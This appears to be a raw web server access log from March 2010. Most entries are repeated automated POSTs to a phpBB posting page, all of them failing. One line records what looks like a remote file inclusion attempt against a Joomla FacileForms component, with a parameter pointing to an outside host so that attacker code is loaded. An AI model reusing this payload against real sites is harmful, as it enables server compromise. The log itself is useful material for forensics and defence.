64.120.227.34 - - [11/Mar/2010:17:08:30 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
212.95.226.66 - - [11/Mar/2010:17:08:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:08:36 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:08:53 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:09:03 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:09:08 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:09:35 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:09:46 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:09:47 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:10:07 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:10:12 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:10:35 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:10:52 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:10:53 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
62.149.226.208 - - [11/Mar/2010:17:11:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:11:10 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:11:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:11:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:11:41 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:12:15 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:12:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:12:44 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:12:50 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:12:55 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:13:17 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:13:24 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:13:32 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:13:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:14:01 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:14:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:14:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:14:42 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:14:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:14:54 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.90.164.110 - - [11/Mar/2010:17:15:01 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
209.235.254.107 - - [11/Mar/2010:17:15:10 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:15:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:15:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:15:35 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
115.124.102.102 - - [11/Mar/2010:17:15:45 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.metodist.ru/images/id? HTTP/1.1" 404 605 "-" "libwww-perl/5.820" "webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:15:46 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:16:06 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:16:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:16:17 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:16:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:16:47 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:16:55 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.39.140.138 - - [11/Mar/2010:17:17:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:17:14 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:17:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:17:36 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:17:37 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:18:05 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:18:07 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:18:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
69.20.70.31 - - [11/Mar/2010:17:18:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:18:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:18:45 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:18:56 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:19:03 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.17.253.220 - - [11/Mar/2010:17:19:04 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:19:27 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:19:32 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:19:34 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:20:01 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:20:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:20:14 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:20:34 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:20:46 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
68.51.119.141 - - [11/Mar/2010:17:20:51 -0800] "GET /yahoo/SendMail.php HTTP/1.1" 200 4921 "http://us.1.p11.webhosting.yahoo.com/phpmailsetup" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9" "www.webmaster-showcase.net"
68.51.119.141 - - [11/Mar/2010:17:20:51 -0800] "GET /yahoo/images/c.gif HTTP/1.1" 404 579 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9" "www.webmaster-showcase.net"
68.51.119.141 - - [11/Mar/2010:17:20:52 -0800] "GET /favicon.ico HTTP/1.1" 404 572 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:20:58 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:21:04 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:21:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:21:30 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:21:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:22:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
208.109.21.238 - - [11/Mar/2010:17:22:02 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:22:11 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:22:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:22:36 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:22:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:23:00 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:23:06 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
67.86.45.193 - - [11/Mar/2010:17:23:26 -0800] "GET / HTTP/1.1" 200 686 "http://us.1.p2.webhosting.yahoo.com/v/php/support.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:23:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
67.86.45.193 - - [11/Mar/2010:17:23:26 -0800] "GET /nav.php HTTP/1.1" 200 4763 "http://webmaster-showcase.net/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "webmaster-showcase.net"
67.86.45.193 - - [11/Mar/2010:17:23:26 -0800] "GET /main.php HTTP/1.1" 200 5342 "http://webmaster-showcase.net/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "webmaster-showcase.net"
67.86.45.193 - - [11/Mar/2010:17:23:27 -0800] "GET /images/logo.gif HTTP/1.1" 200 3261 "http://webmaster-showcase.net/nav.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:23:29 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
67.86.45.193 - - [11/Mar/2010:17:23:30 -0800] "GET /favicon.ico HTTP/1.1" 404 568 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "webmaster-showcase.net"
212.95.226.66 - - [11/Mar/2010:17:23:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
67.86.45.193 - - [11/Mar/2010:17:23:34 -0800] "GET /php/index.php HTTP/1.1" 200 4188 "http://webmaster-showcase.net/nav.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:23:44 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:23:57 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:24:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:24:22 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
